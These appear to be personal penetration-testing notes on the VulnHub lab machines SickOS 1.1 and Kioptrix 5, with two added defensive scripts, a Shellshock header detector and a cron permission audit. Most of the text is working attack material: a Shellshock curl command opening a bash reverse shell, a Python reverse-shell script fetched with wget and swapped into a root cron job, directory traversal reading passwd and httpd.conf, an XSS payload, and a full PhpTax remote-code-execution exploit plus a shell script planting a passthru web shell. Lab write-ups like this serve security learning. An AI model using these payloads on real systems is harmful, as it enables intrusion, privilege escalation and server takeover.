# curl -H "U: () { :;}; echo ; echo ;/bin/bash -c bash -i >& /dev/tcp/10.10.10.3/443 0>&1;" --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status
window 1

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c "import pty;pty.spawn('/bin/bash')"
www-data@SickOs:/usr/lib/cgi-bin$ 

reverse-shell!
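A detection-side view of the same request, as an added example that is not part of the original post: parse the raw request head and flag any header value that begins with the "() {" function-definition prefix of CVE-2014-6271, the marker the probe above carries in its U header. The sample requests are constructed; the Shellshock header is the one shown above, and the proxy form is how curl sends it when --proxy is used.

```python
import re
from urllib.parse import urlsplit

# Bash reads exported functions from environment variables whose value starts
# with "() {"; the CGI handler copies request headers into such variables,
# which is the path used against /cgi-bin/status above.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")


def parse_request(raw):
    """Split a raw HTTP/1.x request head into (request_line, [(name, value)])."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.append((name.strip(), value.strip()))
    return lines[0], headers


def is_cgi_target(request_line):
    """True when the request is for /cgi-bin/, accepting both the origin form
    Apache sees and the absolute-URI form sent to the Squid proxy."""
    parts = request_line.split(" ")
    if len(parts) != 3:
        return False
    return urlsplit(parts[1]).path.startswith("/cgi-bin/")


def shellshock_hits(raw):
    """Return the (header, value) pairs carrying the function-definition prefix."""
    _, headers = parse_request(raw)
    return [(n, v) for n, v in headers if SHELLSHOCK_RE.search(v)]


def classify(raw):
    """'shellshock-cgi' for a CGI request with a matching header,
    'shellshock-header' when the header is present on a non-CGI path,
    'clean' otherwise."""
    request_line, _ = parse_request(raw)
    if not shellshock_hits(raw):
        return "clean"
    return "shellshock-cgi" if is_cgi_target(request_line) else "shellshock-header"


# Constructed samples. PROBE is the request from the writeup as Apache sees it
# after Squid; PROXY_FORM is the same request as sent to the proxy; BENIGN has
# braces in header values but no function prefix and must not trigger.
PROBE = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: 10.10.10.9\r\n"
    "User-Agent: curl/7.68.0\r\n"
    "U: () { :;}; echo ; echo ;/bin/bash -c id;\r\n"
    "\r\n"
)
PROXY_FORM = (
    "GET http://10.10.10.9/cgi-bin/status HTTP/1.1\r\n"
    "Host: 10.10.10.9\r\n"
    "U: () { :;}; echo ; echo ;/bin/bash -c id;\r\n"
    "\r\n"
)
BENIGN = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: 10.10.10.9\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) {compatible}\r\n"
    "Cookie: prefs={\"theme\":\"dark\"}\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, raw in (("probe", PROBE), ("proxy", PROXY_FORM), ("benign", BENIGN)):
        print(label, classify(raw), shellshock_hits(raw))
```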

robots.txt

Accessing it gives:

User-agent: *
Disallow: /
Dissalow: /wolfcms

So, look at this "wolfcms" thing.
Looks like some kind of homepage.
Found the login page at "http://10.10.10.9/wolfcms/?/admin/login".
Unbelievably, user: admin, password: admin logs you in.
After logging in there is a helpful "Upload file" button.
Nothing to do but place reverse.php there.

window 1

# rlwrap nc -nlvp 8080
window 2

# curl --proxy 10.10.10.9:3128 http://10.10.10.9/wolfcms/public/reverse.php
window 1

Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 23:34:51 up  3:03,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

after reverse-shell

connect.py

Look into "connect.py", which had actually caught my eye in the earlier dirb run.

www-data@SickOs:/usr/lib/cgi-bin$ cd /var/www
cd /var/www
www-data@SickOs:/var/www$ ls
ls
connect.py  index.php  robots.txt  wolfcms
www-data@SickOs:/var/www$ cat connect.py
cat connect.py
#!/usr/bin/python

print "I Try to connect things very frequently\n"
print "You may want to try my services"

Connects frequently? Even more suspicious.
Looking at cron made clear what this was about.

www-data@SickOs:/var/www$ ls -al /etc/cron.d
ls -al /etc/cron.d
total 20
drwxr-xr-x  2 root root 4096 Dec  5  2015 .
drwxr-xr-x 90 root root 4096 May  3 20:31 ..
-rw-r--r--  1 root root  102 Jun 20  2012 .placeholder
-rw-r--r--  1 root root   52 Dec  5  2015 automate
-rw-r--r--  1 root root  544 Jul  2  2015 php5
www-data@SickOs:/var/www$ cat /etc/cron.d/automate
cat /etc/cron.d/automate

* * * * * root /usr/bin/python /var/www/connect.py

In other words, tamper with "connect.py", which runs periodically as root, and you get root.
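An audit for the misconfiguration found above (a root cron job whose script can be modified by another user), added here as an example and not taken from the original post. It parses /etc/cron.d entries laid out like the automate file above and checks every absolute path in a root job's command line; the layout it runs against is constructed in a temporary directory, and trusted_uids is widened to the current user only so the demo runs unprivileged (in production leave it at root).

```python
import os
import shlex
import shutil
import stat
import tempfile


def parse_cron_d_line(line):
    """Return (user, argv) for a /etc/cron.d job line, or None for blank
    lines, comments and variable assignments such as SHELL=/bin/sh."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
        return None
    # @reboot/@daily lines have one schedule field, the others have five.
    n = 3 if line.startswith("@") else 7
    parts = line.split(None, n - 1)
    if len(parts) < n:
        return None
    try:
        argv = shlex.split(parts[-1])
    except ValueError:  # unbalanced quotes: fall back to a plain split
        argv = parts[-1].split()
    return parts[-2], argv


def untrusted_write_path(path, trusted_uids):
    """Describe how a user outside trusted_uids could change the file, or None."""
    st = os.stat(path)
    if st.st_uid not in trusted_uids:
        return f"owned by uid {st.st_uid}"
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        return f"group-writable (gid {st.st_gid})"
    parent = os.stat(os.path.dirname(path) or "/")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        return "parent directory world-writable without sticky bit"
    return None


def audit_cron_d(cron_dir, trusted_uids=(0,)):
    """Return (cron_file, path, reason) for every root job whose command
    references an existing file that someone untrusted could modify."""
    findings = []
    for name in sorted(os.listdir(cron_dir)):
        full = os.path.join(cron_dir, name)
        # cron ignores files whose names contain a dot (e.g. .placeholder).
        if "." in name or not os.path.isfile(full):
            continue
        with open(full) as fh:
            for line in fh:
                parsed = parse_cron_d_line(line)
                if parsed is None or parsed[0] != "root":
                    continue
                for arg in parsed[1]:
                    if os.path.isabs(arg) and os.path.exists(arg):
                        reason = untrusted_write_path(arg, trusted_uids)
                        if reason:
                            findings.append((name, arg, reason))
    return findings


def demo():
    """Constructed layout: one root job on a world-writable script (the
    connect.py case), one on a properly protected script, and one job that
    does not run as root. Returns (cron_file, script_name, reason) tuples."""
    root = tempfile.mkdtemp(prefix="cronaudit-")
    cron_dir = os.path.join(root, "cron.d")
    os.mkdir(cron_dir)
    safe = os.path.join(root, "backup.py")
    loose = os.path.join(root, "connect.py")
    for path, mode in ((safe, 0o755), (loose, 0o777)):
        with open(path, "w") as fh:
            fh.write("print('job')\n")
        os.chmod(path, mode)
    with open(os.path.join(cron_dir, "automate"), "w") as fh:
        fh.write("SHELL=/bin/sh\n")
        fh.write(f"* * * * * root /usr/bin/python {shlex.quote(loose)}\n")
        fh.write(f"@daily root /usr/bin/python {shlex.quote(safe)}\n")
        fh.write(f"*/5 * * * * www-data /usr/bin/python {shlex.quote(loose)}\n")
    with open(os.path.join(cron_dir, ".placeholder"), "w") as fh:
        fh.write("# ignored by cron\n")
    try:
        found = audit_cron_d(cron_dir, trusted_uids=(0, os.getuid()))
    finally:
        shutil.rmtree(root)
    return [(f, os.path.basename(p), r) for f, p, r in found]


if __name__ == "__main__":
    print(demo())
```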

attacker

# cat getroot.py 
#! /usr/bin/env python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.3",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
root@kali:~/EXattack/Vulunhub/SickOS1-1# python -m SimpleHTTPServer 80
victim

www-data@SickOs:/tmp$ cd /tmp
cd /tmp
www-data@SickOs:/tmp$ wget 10.10.10.3/getroot.py
wget 10.10.10.3/getroot.py
--2020-05-03 23:12:22--  http://10.10.10.3/getroot.py
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 238 [text/plain]
Saving to: `getroot.py'

100%[======================================>] 238         --.-K/s   in 0s      

2020-05-03 23:12:22 (17.2 MB/s) - `getroot.py' saved [238/238]

www-data@SickOs:/tmp$ cp /tmp/getroot.py /var/www/connect.py
cp /tmp/getroot.py /var/www/connect.py
attacker

# nc -nlvp 8080

Now just wait for "connect.py" to run.
Once it runs, root.

attacker

# id
uid=0(root) gid=0(root) groups=0(root)

Bonus

# cd /root
# ls
a0216ea4d51874464078c618298b1367.txt
# cat a0216ea4d518^?
cat: a0216ea4d518: No such file or directory
# cat *.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

So these existed too

# dirb http://10.10.10.9/wolfcms -p 10.10.10.9:3128

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun May  3 13:49:54 2020
URL_BASE: http://10.10.10.9/wolfcms/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: 10.10.10.9:3128

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.9/wolfcms/ ----
+ http://10.10.10.9/wolfcms/composer (CODE:200|SIZE:403)                       
+ http://10.10.10.9/wolfcms/config (CODE:200|SIZE:0)                           
==> DIRECTORY: http://10.10.10.9/wolfcms/docs/                                 
+ http://10.10.10.9/wolfcms/favicon.ico (CODE:200|SIZE:894)                    
+ http://10.10.10.9/wolfcms/index (CODE:200|SIZE:3975)                         
+ http://10.10.10.9/wolfcms/index.php (CODE:200|SIZE:3975)                     
==> DIRECTORY: http://10.10.10.9/wolfcms/public/                               
+ http://10.10.10.9/wolfcms/robots (CODE:200|SIZE:0)                           
+ http://10.10.10.9/wolfcms/robots.txt (CODE:200|SIZE:0)                       
                                                                               
---- Entering directory: http://10.10.10.9/wolfcms/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://10.10.10.9/wolfcms/public/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun May  3 13:50:01 2020
DOWNLOADED: 4612 - FOUND: 7
# dirb http://10.10.10.9/cgi-bin -p 10.10.10.9:3128

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun May  3 13:50:10 2020
URL_BASE: http://10.10.10.9/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: 10.10.10.9:3128

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.9/cgi-bin/ ----
+ http://10.10.10.9/cgi-bin/status (CODE:200|SIZE:197)                         
                                                                               
-----------------
END_TIME: Sun May  3 13:50:17 2020
DOWNLOADED: 4612 - FOUND: 1

Look carefully at cron, httpd.conf and .htaccess.

vulnhub Kioptrix 5 (1.4) notes

kioptrix 5(1-4)

Without thinking, I did the usual: no virtual disk at creation, add the IDE disk afterwards, and it did not boot.
In addition to the originally distributed image (.vmdk), download *fix.zip.
Create the VM from the "*.vbox" contained in *fix.zip, remove the storage that is already attached, and attach "*.vmdk" to IDE again.
Then, as the image included in *fix.zip shows, type ufs:/dev/ada0p2 at the "mountroot>" prompt after starting the VM, and it boots.

pentest

Service enumeration

# nmap -p- 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:13 EDT
Nmap scan report for 10.10.10.8
Host is up (0.00067s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
8080/tcp open   http-proxy
MAC Address: 08:00:27:73:6F:80 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 117.95 seconds
# nmap -p22,80,8080 -sV -version-all 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:17 EDT
Nmap scan report for 10.10.10.8
Host is up (0.00072s latency).

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 08:00:27:73:6F:80 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.64 seconds

nmap takes a while

Points of interest

Details

Approach via Apache on port 80

# nikto -h 10.10.10.8
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.8
+ Target Hostname:    10.10.10.8
+ Target Port:        80
+ Start Time:         2020-04-30 08:21:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server may leak inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ PHP/5.3.8 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ 8672 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2020-04-30 08:23:20 (GMT-4) (98 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.8

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Apr 30 08:29:52 2020
URL_BASE: http://10.10.10.8/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.8/ ----
+ http://10.10.10.8/cgi-bin/ (CODE:403|SIZE:210)                               
+ http://10.10.10.8/index.html (CODE:200|SIZE:152)                             
                                                                               
-----------------
END_TIME: Thu Apr 30 08:30:18 2020
DOWNLOADED: 4612 - FOUND: 2

I think "CVE-2002-0082" came up in Kioptrix 1 too, but does it apply here?
Apparently the Apache version does not match, so it does not.
Nothing in the Apache version and nothing in PHP either, so is this a dead end?
But looking at the source of index.html:

<html>
 <head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>

 <body>
  <h1>It works!</h1>
 </body>
</html>

"pChart2.1.3/index.php"?
Access it.
Something like an admin panel appears.

# searchsploit pChart 2.1
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
pChart 2.1.3 - Multiple Vulnerabilitie | exploits/php/webapps/31173.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
# cat /usr/share/exploitdb/exploits/php/webapps/31173.txt

# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
# Date: 2014-01-24
# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3"
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[0] Summary:
PHP library pChart 2.1.3 (and possibly previous versions) by default
contains an examples folder, where the application is vulnerable to
Directory Traversal and Cross-Site Scripting (XSS).
It is plausible that custom built production code contains similar
problems if the usage of the library was copied from the examples.
The exploit author engaged the vendor before publicly disclosing the
vulnerability and consequently the vendor released an official fix
before the vulnerability was published.


[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server's privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server's configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

Directory Traversal remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.


[2] Cross-Site Scripting (XSS):
"hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script>
This file uses multiple variables throughout the session, and most of
them are vulnerable to XSS attacks. Certain parameters are persistent
throughout the session and therefore persists until the user session
is active. The parameters are unfiltered.

Cross-Site Scripting remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.


[3] Disclosure timeline:
2014 January 16 - Vulnerability confirmed, vendor contacted
2014 January 17 - Vendor replied, responsible disclosure was orchestrated
2014 January 24 - Vendor was inquired about progress, vendor replied
and noted that the official patch is released.

There seem to be several, so let's try them.

Accessing "http://10.10.10.8/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd" from Firefox

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin

Confirmed in Firefox that the payload above (http://10.10.10.8/pChart2.1.3/examples/sandbox/script/session.php?<script>alert('XSS')</script>) fires.
Directory traversal works, but I don't know what to look at.
Come to think of it, dirb turned up a directory that returned 403, so let's look at whatever controls access there, such as .htaccess or httpd.conf.
There doesn't seem to be a .htaccess.
No /etc/httpd/conf/httpd.conf?
Not in /usr/local/apache2/conf/ either?
Now that I think of it, httpd.conf lives in a different place depending on the OS, and this box is FreeBSD, so it's probably somewhere else.
Reference for the guess: FreeBSDでApacheのインストールと起動 - Qiita
Since this is Apache 2.2.x, my guess is /usr/local/etc/apache22/httpd.conf.

Accessing http://192.168.1.68/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf in Firefox:

#
# This is the main Apache HTTP server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See <URL:http://httpd.apache.org/docs/2.2> for detailed information.
# In particular, see 
# <URL:http://httpd.apache.org/docs/2.2/mod/directives.html>
# for a discussion of each configuration directive.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.  
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/foo_log"
# with ServerRoot set to "/usr/local" will be interpreted by the
# server as "/usr/local//var/log/foo_log".

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# Do not add a slash at the end of the directory path.  If you point
# ServerRoot at a non-local disk, be sure to point the LockFile directive
# at a local disk.  If you wish to share the same ServerRoot for multiple
# httpd daemons, you will need to change at least LockFile and PidFile.
#
ServerRoot "/usr/local"

#
# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, instead of the default. See also the <VirtualHost>
# directive.
#
# Change this to Listen on specific IP addresses as shown below to 
# prevent Apache from glomming onto all bound IP addresses.
#
#Listen 12.34.56.78:80
Listen 80
Listen 8080
(snip)
# "/usr/local/www/apache22/cgi-bin" should be changed to whatever your ScriptAliased
# CGI directory exists, if you have that configured.
#
<Directory "/usr/local/www/apache22/cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
    Allow from all
</Directory>

(snip)

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>



</VirtualHost>


Include etc/apache22/Includes/*.conf

There it is.
As suspected, access control was being done in httpd.conf.
Port 8080 is access-controlled too, but only requests that set the Mozilla4_browser environment variable, i.e. a User-Agent starting with Mozilla/4.0, are allowed?

# curl -XGET -H "User-Agent:Mozilla/4.0" 10.10.10.8:8080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<ul><li><a href="phptax/"> phptax/</a></li>
</ul>
</body></html>

phptax?

# searchsploit phptax
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)               | exploits/php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution            | exploits/php/webapps/25849.txt
phptax 0.8 - Remote Code Execution                                           | exploits/php/webapps/21665.txt
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

I don't want to use Metasploit.
But I don't know the phptax version, so should I just try my luck?
Looking it up, though, 0.8 seems to be the latest version?
If so, that's pretty sloppy security, but I'll bet on it.
Let's try the newer one, 25849.txt.

# cat /usr/share/exploitdb/exploits/php//webapps/25849.txt 
#
#  ,--^----------,--------,-----,-------^--,
#  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
#  `+---------------------------^----------|
#    `\_,-------, _________________________|
#      / XXXXXX /`|     /
#     / XXXXXX /  `\   /
#    / XXXXXX /\______(
#   / XXXXXX /          
#  / XXXXXX /
# (________(            
#  `------'

# Exploit Title   : PhpTax File Manipulation(newvalue,field) Remote Code Execution
# Date            : 31 May 2013
# Exploit Author  : CWH Underground
# Site            : www.2600.in.th
# Vendor Homepage : http://phptax.sourceforge.net/
# Software Link   : http://sourceforge.net/projects/phptax/
# Version         : 0.8
# Tested on       : Window and Linux


#####################################################
#VULNERABILITY: FILE MANIPULATION TO REMOTE COMMAND EXECUTION
#####################################################

#index.php

#LINE 32: fwrite fwrite($zz, "$_GET['newvalue']"); 
#LINE 31: $zz = fopen("./data/$field", "w"); 
#LINE  2: $field = $_GET['field']; 

#####################################################
#DESCRIPTION
#####################################################

#An attacker might write to arbitrary files or inject arbitrary code into a file with this vulnerability. 
#User tainted data is used when creating the file name that will be opened or when creating the string that will be written to the file. 
#An attacker can try to write arbitrary PHP code in a PHP file allowing to fully compromise the server.


#####################################################
#EXPLOIT
#####################################################

<?php
 
$options = getopt('u:');
   
if(!isset($options['u']))
die("\n        Usage example: php exploit.php -u http://target.com/ \n"); 
   
$url     =  $options['u'];
$shell = "{$url}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E";

$headers = array('User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
'Content-Type: text/plain');
   
echo "        [+] Submitting request to: {$options['u']}\n";
   
$handle = curl_init();
   
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
   
$source = curl_exec($handle);
curl_close($handle);
   
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo "        [+] Exploit completed successfully!\n";
echo "        ______________________________________________\n\n        {$url}/data/rce.php?cmd=id\n";
}
else
{
die("        [+] Exploit was unsuccessful.\n");
}
    
?>  

################################################################################################################
# Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 
################################################################################################################

I thought it was just text, but it actually includes an exploit.
So it's exploitable because of the problems on lines 2, 31 and 32 of /phptax/index.php.
Just to be sure, let me check usr/local/apache22//phptax/index.php.

# curl -vI -XGET -H "User-Agent:Mozilla/4.0" 10.10.10.8:8080/phptax/index.php
*   Trying 10.10.10.8:8080...
* TCP_NODELAY set
* Connected to 10.10.10.8 (10.10.10.8) port 8080 (#0)
> GET /phptax/index.php HTTP/1.1
> Host: 10.10.10.8:8080
> Accept: */*
> User-Agent:Mozilla/4.0
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Date: Fri, 01 May 2020 03:44:35 GMT
Date: Fri, 01 May 2020 03:44:35 GMT
< Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
< X-Powered-By: PHP/5.3.8
X-Powered-By: PHP/5.3.8
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Content-Type: text/html
Content-Type: text/html

< 
* Excess found: excess = 4131 url = /phptax/index.php (zero-length body)
* Connection #0 to host 10.10.10.8 left intact
Accessing http://10.10.10.8/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/www/apache22/data2/phptax/index.php in Firefox.
The file's location can be worked out from httpd.conf.

<?php
$field=$_GET[field];
(snip)

   if ($_GET[newvalue]) {
       $zz=fopen("./data/$field","w");
       fwrite($zz,"$_GET[newvalue]");
       fclose($zz);
   }

(snip)

So I just need to adapt the exploit code following 25849.txt.

# cp /usr/share/exploitdb/exploits/php//webapps/25849.txt  phptax_exploit.php

When I tried to run this exploit, PHP complained that it doesn't know curl_init(), so install it.

# php -v
PHP 7.3.15-3 (cli) (built: Feb 23 2020 07:15:44) ( NTS )
(snip)
# apt install php7.3-curl

Alright, will it work now?

# php phptax_exploit.php -u http://10.10.10.8:8080/phptax
(snip)
#####################################################
#EXPLOIT
#####################################################

        [+] Submitting request to: http://10.10.10.8:8080/phptax
        [+] Exploit was unsuccessful.

Nope. It fails.
I can't figure out why, so I'll rewrite it as a shell script.

#!/bin/sh
# ./phptax_exploit.sh <url-to-phptax> <url-encoded-command>

# phptax < ver 0.8 exploit

# vulncode in phptax/index.php
#     $field = $_GET['field']; in line 2
#     $zz = fopen("./data/$field", "w"); in line 31
#     fwrite fwrite($zz, "$_GET['newvalue']"); in line 32

target_site_to_phptax_index_path="$1" # example "http://10.10.10.8:8080/phptax"
remote_code="$2" # example "id"; URL-encode it!!!! a space is "%20"
# Step 1: the unfiltered field/newvalue parameters write a one-line PHP file into ./data/
# (the 8080 vhost only answers to a User-Agent starting with Mozilla/4.0, see httpd.conf)
curl -vI -H "User-Agent:Mozilla/4.0" "${target_site_to_phptax_index_path}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E"
printf '\n'
# Step 2: run the command through the file just written
